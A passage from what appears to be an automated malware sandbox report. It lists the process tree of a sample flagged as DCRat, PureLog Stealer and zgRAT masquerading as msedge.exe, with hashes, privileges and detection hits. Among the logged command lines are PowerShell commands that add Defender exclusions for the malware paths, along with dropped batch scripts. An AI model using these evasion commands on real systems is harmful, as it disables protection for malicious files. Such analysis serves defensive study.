                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                    Start time:12:25:32
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                    Imagebase:0x820000
                                                                                                                                                                                                    File size:65'440 bytes
                                                                                                                                                                                                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                    Start time:12:25:45
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "
                                                                                                                                                                                                    Imagebase:0xa40000
                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                    Start time:12:25:45
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                    Start time:12:25:45
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Edge\msedge.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Edge/msedge.exe"
                                                                                                                                                                                                    Imagebase:0xc90000
                                                                                                                                                                                                    File size:1'963'008 bytes
                                                                                                                                                                                                    MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000000.1650599430.0000000000C92000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000F.00000002.1706544888.00000000131A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Edge\msedge.exe, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Edge\msedge.exe, Author: Joe Security
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    • Detection: 74%, ReversingLabs
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                                    Start time:12:25:48
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline"
                                                                                                                                                                                                    Imagebase:0x7ff783050000
                                                                                                                                                                                                    File size:2'759'232 bytes
                                                                                                                                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                    Start time:12:25:48
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                                    Start time:12:25:48
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
                                                                                                                                                                                                    Imagebase:0x6c0000
                                                                                                                                                                                                    File size:1'963'008 bytes
                                                                                                                                                                                                    MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe, Author: Joe Security
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    • Detection: 74%, ReversingLabs
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                                    Start time:12:25:48
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
                                                                                                                                                                                                    Imagebase:0xd40000
                                                                                                                                                                                                    File size:1'963'008 bytes
                                                                                                                                                                                                    MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                                    Start time:12:25:48
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3594.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCF5F43EE1A3D5479687C855494E4EF77.TMP"
                                                                                                                                                                                                    Imagebase:0x7ff6c9980000
                                                                                                                                                                                                    File size:52'744 bytes
                                                                                                                                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:24
                                                                                                                                                                                                    Start time:12:25:48
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c1gtejqg\c1gtejqg.cmdline"
                                                                                                                                                                                                    Imagebase:0x7ff783050000
                                                                                                                                                                                                    File size:2'759'232 bytes
                                                                                                                                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:25
                                                                                                                                                                                                    Start time:12:25:48
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:26
                                                                                                                                                                                                    Start time:12:25:49
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37B7.tmp" "c:\Windows\System32\CSC97DCA7013344A2AA8495395955A7A7.TMP"
                                                                                                                                                                                                    Imagebase:0x7ff6c9980000
                                                                                                                                                                                                    File size:52'744 bytes
                                                                                                                                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:30
                                                                                                                                                                                                    Start time:12:25:49
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe'
                                                                                                                                                                                                    Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:31
                                                                                                                                                                                                    Start time:12:25:49
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'
                                                                                                                                                                                                    Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:32
                                                                                                                                                                                                    Start time:12:25:49
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:33
                                                                                                                                                                                                    Start time:12:25:49
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:34
                                                                                                                                                                                                    Start time:12:25:50
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zugvBzMsRZ.bat"
                                                                                                                                                                                                    Imagebase:0x7ff7f6c90000
                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:35
                                                                                                                                                                                                    Start time:12:25:50
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:36
                                                                                                                                                                                                    Start time:12:25:50
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:chcp 65001
                                                                                                                                                                                                    Imagebase:0x7ff7f1ec0000
                                                                                                                                                                                                    File size:14'848 bytes
                                                                                                                                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:37
                                                                                                                                                                                                    Start time:12:25:50
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Edge\msedge.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Edge\msedge.exe
                                                                                                                                                                                                    Imagebase:0x1c0000
                                                                                                                                                                                                    File size:1'963'008 bytes
                                                                                                                                                                                                    MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:38
                                                                                                                                                                                                    Start time:12:25:50
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\w32tm.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                                                                    Imagebase:0x7ff7e4710000
                                                                                                                                                                                                    File size:108'032 bytes
                                                                                                                                                                                                    MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:39
                                                                                                                                                                                                    Start time:12:25:50
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Edge\msedge.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Edge\msedge.exe
                                                                                                                                                                                                    Imagebase:0xf80000
                                                                                                                                                                                                    File size:1'963'008 bytes
                                                                                                                                                                                                    MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:40
                                                                                                                                                                                                    Start time:12:25:53
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                    Imagebase:0x7ff605670000
                                                                                                                                                                                                    File size:496'640 bytes
                                                                                                                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:41
                                                                                                                                                                                                    Start time:12:25:55
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Edge\msedge.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Edge\msedge.exe"
                                                                                                                                                                                                    Imagebase:0xf0000
                                                                                                                                                                                                    File size:1'963'008 bytes
                                                                                                                                                                                                    MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:42
                                                                                                                                                                                                    Start time:12:26:00
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
                                                                                                                                                                                                    Imagebase:0x4b0000
                                                                                                                                                                                                    File size:1'963'008 bytes
                                                                                                                                                                                                    MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:43
                                                                                                                                                                                                    Start time:12:26:02
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qFKlxXtZuP.bat"
                                                                                                                                                                                                    Imagebase:0x7ff7f6c90000
                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:44
                                                                                                                                                                                                    Start time:12:26:02
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:45
                                                                                                                                                                                                    Start time:12:26:02
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:chcp 65001
                                                                                                                                                                                                    Imagebase:0x7ff7f1ec0000
                                                                                                                                                                                                    File size:14'848 bytes
                                                                                                                                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:46
                                                                                                                                                                                                    Start time:12:26:02
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\w32tm.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                                                                    Imagebase:0x7ff7e4710000
                                                                                                                                                                                                    File size:108'032 bytes
                                                                                                                                                                                                    MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:47
                                                                                                                                                                                                    Start time:12:26:07
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
                                                                                                                                                                                                    Imagebase:0x240000
                                                                                                                                                                                                    File size:1'963'008 bytes
                                                                                                                                                                                                    MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:48
                                                                                                                                                                                                    Start time:12:26:09
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Edge\msedge.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Edge\msedge.exe"
                                                                                                                                                                                                    Imagebase:0xfd0000
                                                                                                                                                                                                    File size:1'963'008 bytes
                                                                                                                                                                                                    MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:51
                                                                                                                                                                                                    Start time:12:26:12
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5CZTOTC2vN.bat" "
                                                                                                                                                                                                    Imagebase:0x7ff7f6c90000
                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:52
                                                                                                                                                                                                    Start time:12:26:12
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:53
                                                                                                                                                                                                    Start time:12:26:12
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:chcp 65001
                                                                                                                                                                                                    Imagebase:0x7ff7f1ec0000
                                                                                                                                                                                                    File size:14'848 bytes
                                                                                                                                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:54
                                                                                                                                                                                                    Start time:12:26:12
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:ping -n 10 localhost
                                                                                                                                                                                                    Imagebase:0x7ff7f54f0000
                                                                                                                                                                                                    File size:22'528 bytes
                                                                                                                                                                                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:55
                                                                                                                                                                                                    Start time:12:26:17
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
                                                                                                                                                                                                    Imagebase:0x900000
                                                                                                                                                                                                    File size:1'963'008 bytes
                                                                                                                                                                                                    MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:56
                                                                                                                                                                                                    Start time:12:26:21
                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4evtisdSvL.bat"
                                                                                                                                                                                                    Imagebase:0x7ff7f6c90000
